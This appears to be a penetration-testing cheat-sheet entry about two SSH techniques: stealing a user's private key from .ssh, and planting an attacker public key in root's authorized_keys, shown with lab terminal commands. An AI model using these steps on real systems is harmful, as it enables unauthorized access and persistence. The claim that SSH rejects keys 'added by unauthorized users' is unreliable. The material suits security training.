If read access is available to a user's .ssh directory (e.g., "/home/user/.ssh/" or "/root/.ssh/", it's possible to exfiltrate private SSH key "id_rsa". Once copied to the attacker's machine, this key can be used to authenticate as that user via SSH using the -i flag.
READ ACCESS
root@oco:~$ vim id_rsa
...
paste copied key value
root@oco:~$ chmod 600 id_rsa
* changing the file permission to restrictive is required; else
the ssh server would prevent them from working
root@oco:~$ ssh root@10.10.10.10 -i id_rsa
root@10.10.10.10#
WRITE ACCESS
With write access to a target user's .ssh directory, an attacker can append their public key to the target's authorized_keys file, granting SSH access as that user. This technique only works if the attacker already has control over the target user, as most SSH configurations will reject keys added by unauthorized users.
root@oco:~$ ssh-keygen -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): *******
Enter same passphrase again: *******
Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:...SNIP... user@parrot
The key's randomart image is:
+---[RSA 3072]----+
| ..o.++.+ |
...SNIP...
| . ..oo+. |
+----[SHA256]-----+
user@target:~$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
* Copy the contents of key.pub and append it to the target user's authorized_keys
#access the target
root@oco:~$ ssh -i {key} root@10.10.10.10
root@remotehost#
